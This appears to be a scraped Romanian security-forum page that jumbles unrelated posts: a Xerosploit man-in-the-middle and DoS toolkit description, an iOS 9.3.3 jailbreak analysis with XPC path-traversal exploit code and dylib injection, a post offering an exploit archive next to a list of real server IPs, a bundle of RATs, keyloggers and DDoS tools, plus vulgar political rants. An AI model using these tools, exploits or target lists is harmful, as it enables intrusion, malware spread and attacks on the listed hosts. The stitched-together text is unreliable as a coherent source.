Leaderboard

Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap. Dependencies nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev tabulate terminaltables Instalation Dependencies will be automatically installed. git clone https://github.com/LionSec/xerosploit cd xerosploit && sudo python install.py sudo xerosploit Tested on Operative system Version Ubuntu 16.04 / 15.10 Kali linux Rolling / Sana Parrot OS 3.1 Features Port scanning Network mapping Dos attack Html code injection Javascript code injection Download intercaption and replacement Sniffing Dns spoofing Background audio reproduction Images replacement Drifnet Webpage defacement and more ... Demonstration Contact: Website : http://lionsec.net Youtube : https://youtube.com/inf98es Facebook : https://facebook.com/in98 Twitter: @LionSec1 Email : ledonman@gmail.com Download Source

in campania prezidentiala am incercat sa le explic cunoscutilor, inclusiv unor oameni inteligenti cu studii, ca de 25 ani pana acum si inclusiv, totul se bazeaza pe manipulare si mitologie politica; mitul salvatorului, mitul tapului ispasitor, acum mitul neamtului. toti au zis, asa si ? "asa si"....si asa o sa si ramana.

Buffer Overflow Attacks Explained: Saved Return Pointer Overwrite In today’s Whiteboard Wednesday, David Maloney, Senior Security Researcher at Rapid7, will discuss buffer overflow attacks. David will walk you through a buffer overflow exploit called “saved return pointer overwrite” to show you specifically how buffer overflow attacks work. Watch this week’s Whiteboard Wednesday to learn more. https://www.rapid7.com/resources/videos/buffer-overflow-exploit-explained.jsp Mitigating Buffer Overflow Attacks with Stack Cookies In today’s Whiteboard Wednesday, David Maloney, Senior Security Researcher at Rapid7, will share a technique to help mitigate buffer overflow attacks. In a previous Whiteboard Wednesday, we explained how buffer overflow attacks work. This week, we are going to explain how to help mitigate buffer overflow vulnerabilities with stack cookies. Watch this week’s Whiteboard Wednesday to learn more. https://www.rapid7.com/resources/videos/mitigating-buffer-overflow-attacks-with-stack-cookies.jsp Exploit Explained: Structured Exception Handler Overwrite In today’s Whiteboard Wednesday, David Maloney, Sr. Security Engineer at Rapid7, will talk about structured exception handler overwrite vulnerabilities and how they work. Watch this week’s Whiteboard Wednesday to learn more. https://www.rapid7.com/resources/videos/structured-exception-handler-overwrite-explained.jsp SEHOP: Mitigating Structured Exception Handler Overwrite Vulnerabilities In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss how SEHOP can help you mitigate structured exception handler overwrite vulnerabilities. https://www.rapid7.com/resources/videos/mitigating-seh-overwrites-with-sehop.jsp Exploit Explained: Return Oriented Processing (ROP) In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss the ROP exploit technique for buffer overflow vulnerabilities. https://www.rapid7.com/resources/videos/rop-exploit-explained.jsp Mitigating Return Oriented Processing (ROP) Vulnerabilities In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss the ROP exploit technique for buffer overflow vulnerabilities and how to mitigate these security issues. https://www.rapid7.com/resources/videos/mitigating-rop-vulnerabilities.jsp

- Ba nebunule din coceni, back track era open source, de ce sa piratezi cd-urile si cum ? - Pentru brutal force intra pe google si cauta "brutal forced ass worship" - Lasa-n pula mea butonul ala. Lasa iarba daca iti doresti ceva

Cei de la asociatia asta ajuta cu astfel de lucruri: https://gloryholefoundation.com/

http://www.liberties.eu/en/news/romanian-secret-services-granted-european-fund-for-mass-surveillance

Da, a mai aparut asta in mai multe reportaje dar pe sistemul tipic romanesc publicul accepta flegme in gura cu candoarea obisnuita. Unii chiar se ofera voluntari. Cine mai sta in tara aia de babuini merita si mai nasoale. Oricum libertatea este o iluzie dar cel putin in alte parti se vinde iluzia cu mai putin tupeu.

am intrebat pentru ca stiam ca te-ai schimbat pe UK, in trecut facturai pe DE merci, o sa dau mai departe :beer:

Neplatitor. Facturarea se face de firma din UK. Ai mai avut server la mine pentru o firma ceva. (Nu stiu daca am facturat de pe firma din DE sau de pe cea din UK)

What is the jailbreak for iOS 9.3.3 actually doing? – Part 1 Friday 26 August 2016/by James Shanahan Many people who jailbreak their devices are unaware of the vulnerabilities being exploited in order to gain privileged access to the underlying iOS operating system. Users typically jailbreak devices in order to install applications that have not undergone Apple’s software evaluation process. This post will explore the low level mechanics of the iOS 9.3.3 jailbreak as an educational case study. There are many restrictions in place that are enforced for applications and users. A Jailbreak ultimately requires a bug in the kernel that can be exploited. Restrictions include KASLR, SMAP, KPP and the App Sandbox. In order to gain access to the kernel, there are typically multiple software flaws and misconfigurations that must be leveraged, which then leads to access as a privileged and unrestricted user. Overview of iOS Security Architecture Below is a high level diagram of the iOS Security Architecture that demonstrates security controls that are in place between the hardware/firmware and software. ios security architecture The App Sandbox is desinged to ensure that apps are doing what they’re supposed to do. It is also there to protect applications from unintential bugs that may be introduced through flaws in the code or inherited from a framework. Contrary to an application without App Sandbox, an application with App Sandbox limits the resources on a per app basis to protect from such flaws. App Sandbox is there as a last line of defenese against varrious attacks that can be utlized to gain access, delete, or corrupt data pertaining to the targeted application. The image below depicts how an application is protected using the App Sandbox. With and without App sandbox XPC XPC is an advanced framework that is built on Mach messages and simplifies low level Inter-process Communication (IPC). XPC allows communication between Application and System services. These messages are passed between an XPC Server and XPC Client. XPC is widely used by system frameworks and first-party applications. You can run the following command to survey the inventory of XPC services that are on a given iOS or OS X system: find /Applications -name \*.xpc Exploiting Userland vulnerability in assetsd via XPC message Now we understand some of the various technologies used to mitigate certain issues targeting iOS applications, as well as some of those that will be used as an exploit vehicle to trigger Userlandcode execution. Let’s take a look at how the iOS 9.3.3 Jailbreak works under the hood. A vulnerability exists in assetsd that allows files and directories to me moved to a new location. In iOS 9.3.3 container apps can communicate with a service provided by /System/Library/Frameworks/AssetsLibrary.framework named com.apple.PeristentURLTranslator.Gatekeepervia XPC. There is a method that allows a user to move a specified file or directory in/var/mobile/MEDIA/DCIM. The problem is that srcPath and destSubdir are derived from user input retrieved in XPC messages which lack validation. It is possible to use commonly known path traversal tricks such as ../ in the srcPath and destSubdir parameters which lead to arbitrary file reads/writes as the iOS mobile user. This is what a sample XPC message that triggers the issue in assetsd would look like: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 // code snippet – thx Pangu xpc_connection_t client = xpc_connection_create_mac_service("com.apple.PersistentURLTranslator.Gatekeeper", NULL, 0); xpc_connection_set_event_handler(client, ^void(xpc_object_t_response) { }); xpc_connection_resume(client); xpc_object_t_ dict = xpc_dictionary_create(NULL, NULL, ); NSString *dstPATH = [@"../../../../../../../" stringByAppendingPathCompnent:dest]; xpc_dictionary_set_string(dict, "srcPath", [src UTF8String]); xpc_dictionary_set_string(dict, "destSubdir", [dstPath UTF8String]); xpc_dictionary_set_int64(dict, "transactionID", 4); xpc_dictionary_set_int64(dict, "operation", 4); xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, dict); The issue is triggered on line 10. Utilizing dyld (Dynamic Linker) to Get Arbitrary Code Execution To inject a dylib into a system process, an attacker can utilise the DYLD_INSERT_LIBRARIESenvironment variable, but the executable must have the get-task-allow entitlement. The Pangu team checked all executables in iOS 9 and did not identify one that had the get-task-allowentitlement. They were excited to find that the developer disk images (DDI) did allow this by running the following command: codesign -d --entitlements - .//usr/libexec/vpnagent That command above produces the following output which proves that vpnagent has the entitlement needed: 1 2 3 4 <plist version=1.0> <dict> <key>get-task-allow</key> <true/> In order to make this executable, the old Developer Disk Image (DDI) that contains vpnagentshould be mounted. Even though a failure will occur, MobileStorageMounter will register the trustcache hash values for executables which is signed by Apple. MobileStorageMounter will then notify the kernel that vpnagent is a platform binary without creating any code signing failures on iOS 9. The kernel enforces the sandbox profile for a particular executable in a couple of different ways. First, the default container sandbox profile will be applied if the vpnagent executable is located in/private/var/mobile/Containers/Data/. If the executable is located somewhere else on the system, the kernel will apply the seatbelt-profile, which is specified in the executable’s signature segment. A sample of what one may look like is as follows: 1 2 3 4 (version 1) (debug allow) (allow process*) (deny default) Enabling Debugging In order to enable debug server on iOS 9 a normal DDI should be mounted. Utilizing assetsd Path Traversal XPC Vulnerability to Execute Arbitrary Code The next step is to send a specifically crafted XPC message to exploit a path traversal vulnerability inassetsd to move the vpnagent from the DDI to a place that the debugserver has access to. Once the executable is moved to a path outside of /private/var/mobile/Containers/Data, the sandbox seatbelt-profile will be applied. This will ensure that the kernel does not apply the default sandbox profile. Putting the VPN Agent in Debug Mode and Performing Code Injection Once this has been performed, the debugserver will allow a process with the get-task-allowentitlement to continually run even if code signing invalidation occurs. A dylib can now be injected using the DYLD_INSERT_LIBRARIES environment variable. DYLD_INSERT_LIBRARIES is very similar to LD_PRELOAD on Linux. The signature of a system binary should be used when loading the dylib so that the kernel will believe that the vpnagent is loading an iOS 9 system binary. Below is sample code that demonstrates simple code injection on OS X: #import "ACCalculatorOverrides.h" #include <stdio.h> #include <objc/runtime.h> #include <Foundation/Foundation.h> #include <AppKit/AppKit.h> static IMP sOriginalImp = NULL; @implementation ACCalculatorOverrides +(void)load { // We replace the method -[CalculatorController showAbout:] with the method -[ACCalculatorOverrides patchedShowAbout:] Class originalClass = NSClassFromString(@"CalculatorController"); Method originalMeth = class_getInstanceMethod(originalClass, @selector(showAbout:)); sOriginalImp = method_getImplementation(originalMeth); Method replacementMeth = class_getInstanceMethod(NSClassFromString(@"ACCalculatorOverrides"), @selector(patchedShowAbout:)); method_exchangeImplementations(originalMeth, replacementMeth); } -(void)patchedShowAbout:(id)sender { // We first call the original method to display the original About Box sOriginalImp(self, @selector(showAbout:), self); // Run our custom code which simply display an alert NSAlert *alert = [NSAlert alertWithMessageText:@"Code has been injected!" defaultButton:@"OK" alternateButton:nil otherButton:nil informativeTextWithFormat:@"The code has been injected using DYLD_INSERT_LIBRARIES into Calculator.app"]; [alert runModal]; } @end The following command will build this dynamic library: gcc -framework AppKit -framework Foundation -o CalculatorOverrides.dylib -dynamiclibACCalculatorOverrides.m The final step is to inject it into the application: DYLD_INSERT_LIBRARIES=/PATH_TO/CalculatorOverrides.dylib/Applications/Calculator.app/Contents/MacOS/Calculator &amp; This will result in the following: Performing code injection using dylib As shown above, an alert box was injected. This will be utilised in a similar fashion to exploit the next series of vulnerabilities that will allow a user gain access to the device as a privileged user. Conclusion Most users are unaware that Jailbreaking devices requires the exploitation of security flaws and configuration weaknesses that exist on a particular version of iOS or an application running on their device. These same vulnerabilities can be exploited by those with real malicious intent. Even then, considering the Jailbreak teams do not provide complete source and steps required to jailbreak, it is hard to tell everything that they may be doing. Further details will be covered in the next blog post. [Part 2 – To be Continued] References Pangu Internals – https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf Jonathan Levin. (2013). Mac OS X and iOS Internals. New York, NY: John Wiley & Sons Amit Sing. (2007). Mac OS X Internals. New York, NY: Addison-Wesley Jailbreak Exploits – https://www.theiphonewiki.com/wiki/Jailbreak_Exploits iOS Security – iOS 9.3 or later – https://www.apple.com/business/docs/iOS_Security_Guide.pdf Compromising IDEVICES via Airdrop – https://2015.ruxcon.org.au/assets/2015/slides/ruxcon-2016-dowd.pptx Simple code injection using DYLD_INSERT_LIBRARIES environment variable –http://blog.timac.org/?p=761 App Sandboxing – https://developer.apple.com/app-sandboxing/ osx dylib injection – https://github.com/scen/osxinj Sursa: https://labs.nettitude.com/blog/what-is-the-jailbreak-for-ios-9-3-3-actually-doing-part-1/

Ma intreaba pe mine ce am facut pentru tara mea si de ce am fugit :))) - Am facut stagiul militar pentru o tara plina de hoti. Normal trebuia sa jur ca apar tara de politicieni si conducatorii ei. - Am facut o facultate. - Am investit bani in business-uri pe care le-a futut statul roman. - Am contribuit la buget (taxe si impozite), sa aibe taica-tu pensie. Am primit un sut in gaoaza, asa cum o sa primiti toti. Bag pula in statul roman si in drapelul babuinilor. Daca intra Rusia peste voi, merg si ma inrolez in armata RUSA.

Este un progres imens de la vBulletin la IPBoard. Nu mai eu stiu cate linii de cod am modificat in acea platforma (vB)... 1. Este cel mai mare forum de securitate, nu de web design - te inteleg daca apar probleme de securitate banale, nu daca se vede urat o tema 2. Nu esti singurul, insa sunt multe persoane care "au crescut" pe forum si care au avut de castigat (un job de exemplu) de pe urma sa, dar apoi l-au uitat (stii tu termenul - leeching) 3. S-au pierdut posturile din luna ianuarie a acestui an, atat. Si am urmarit forumul in acea perioada, crede-ma, nu s-a pierdut mare lucru 4. Sunt multi care au interes sa invete, putini capabili (ca timp) sa ii ajute 5. Moderatorii, ca si mine, au familie si job si nu mai au timp de forum 6. Profilul utilizatorului RST nu este acela, doar ca aceia ies mai mult in evidenta. Forumul nu e destinat programatorilor ci pasionatilor de securitate IT care trebuie sa aiba in sange ceva din descrierea ta. Cei care sunt programatori intra aici si deprind trasaturi non-programatorice cum ar fi "think outside the box" Pentesterii (ca si mine) isi pierd timpul pe aici. Insa sunt prea putini care au timpul si daruirea necesara de a posta materiale de calitate. Nu ai mintit, te inteles, sunt de acord cu tine (nu in totalitate). Exista posibilitatea ca acest forum sa dispara, nu neg asta, dar cat timp putem ajuta comunitatea romaneasca sa se dezvolte pe calea cea dreapta, forumul va ramane in picioare. Ma gandesc la tine ca la altii: probabil ai calitatile tehnice si psihologice necesare de a-i ajuta pe altii, dar se pare ca nu o faci. De ce? Pentru ca noua, romanilor, ne place doar sa ne plangem si vrem sa ii vedem pe altii ca fac ceva. Daca vrei o schimbare, incepe prin tine. // Nytro

Contine: 74 a allgo a.pl binged.txt bing.pl bios.txt b.pl expl.pl go gogo plk.pl pwn ss U vuln.log vuln.log http://74.208.72.16 OS: Linux s15348428.onlinehome-server.com 2.6.32-042stab078.28 #1 SMP Mon Jul 8 10:17:22 MSK 2013 x86_64 http://74.208.75.56 OS: Linux s15937362.onlinehome-server.com 2.6.32-042stab078.27 #1 SMP Mon Jul 1 20:48:07 MSK 2013 x86_64 http://74.208.9.60 OS: Linux u15352075.onlinehome-server.com 2.6.27.24rootserver-20090525a #1 SMP Mon May 25 04:55:37 EDT 2009 x86_64 http://74.208.99.2 OS: Linux s15353565.onlinehome-server.com 2.6.32-042stab078.27 #1 SMP Mon Jul 1 20:48:07 MSK 2013 x86_64 http://74.209.17.254 OS: Linux u15391817.onlinehome-server.com 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:32:21 EST 2010 x86_64 http://74.54.151.60 OS: Linux ghlhotelescom02.theplanet.host 2.6.18-164.11.1.el5 #1 SMP Wed Jan 6 13:26:04 EST 2010 x86_64 http://74.54.151.59 OS: Linux ghlhotelescom02.theplanet.host 2.6.18-164.11.1.el5 #1 SMP Wed Jan 6 13:26:04 EST 2010 x86_64 http://74.54.151.61 OS: Linux ghlhotelescom02.theplanet.host 2.6.18-164.11.1.el5 #1 SMP Wed Jan 6 13:26:04 EST 2010 x86_64 http://74.54.228.27 OS: Linux sciton.com 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:32:29 EDT 2011 i686 http://74.54.228.28 OS: Linux sciton.com 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:32:29 EDT 2011 i686 http://74.54.228.29 OS: Linux sciton.com 2.6.18-238.19.1.el5 #1 SMP Fri Jul 15 07:32:29 EDT 2011 i686 http://74.55.203.98 OS: Linux mail.crossfader.net 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 http://74.55.203.99 OS: Linux mail.crossfader.net 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 http://74.86.137.168 OS: Linux xcaretexperiencias.xcaretexperiencias.com.mx 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:40 EST 2010 i686 http://74.86.137.169 OS: Linux xcaretexperiencias.xcaretexperiencias.com.mx 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:40 EST 2010 i686 http://74.86.137.170 OS: Linux xcaretexperiencias.xcaretexperiencias.com.mx 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:40 EST 2010 i686 http://74.86.137.171 OS: Linux xcaretexperiencias.xcaretexperiencias.com.mx 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:40 EST 2010 i686 Nu raspund pentru eventualul sendmail din el sau pentru alte balarii. Uitati-va bine in el inainte sa scanati cu el. Download: Download plk0day.tar from Sendspace.com - send big files the easy way http://r89x.com/plk0day.tar

Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week. Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser. So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, you may have hacked your passwords, login names, and other sensitive data. Opera has around 350 Million users across its range products, but around 1.7 Million users using its Sync service had both their synchronized passwords as well as their authentication passwords leaked in the hack. Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account. Additionally, the company has also informed all Opera Sync users about the security breach and recommended them to change passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera sync using the password resetting page. The complete details about the intrusion and extent of the breach are yet unknown. Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service. However, if you are the one using the same password for multiple sites, you are also advised to change your passwords for those sites manually. Since we’ve repeatedly seen folks reusing passwords across multiple services with recent high-profile account hacking, you are advised to use a good password manager always to keep a strong, unique password for your online accounts. We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement. Via thehackernews.com

???

Im not responsible for your activity. use it at your own risk!] Use a VM or SandBox! DL LINK! For more informations! Admin Finder VPN Binders Booters Botnet Bruteforcers Chat Exploits CommView Crackers Darkcomet Ddosers Deface Creators Dork Seeker DoS - DDoS Doxing Tools Ebooks Email Encrypter and Decrypter Exploit Scanner Gmail Cracker Havij 1.15 Pro IEInspector Injectors IP scanners AccountCreators Admin Page finder Maillist Blackshades 4.8 Bombers Cpanel bruteforcer Crypters DarkComet REMOVER Deface Pages Dork List Doxers Duplicate Remover Instagram Bots Youtube Bots Keylogger md5 MSN Freezer No-IP Portscanner Proxy Finder 80 DIFFERENT RAT'S !!!! Source

Chipset pe cale de a fi prajit, te asteapta la un reballing sau o metoda mai neconformista, care include introducerea placi de baza in cuptorul cu microunde. Incearca cu windows 7. Sau cu drivere stabile, atentie iei de pe site-ul nvidia drivere in faza stable sau recomended. Placa video la laptop se poate schimba doar prin reballing, cea ce rezulta un proces prea scump pentru reparatia laptopului. Pretul reparatiei te ajunge la pretul unui laptop nou.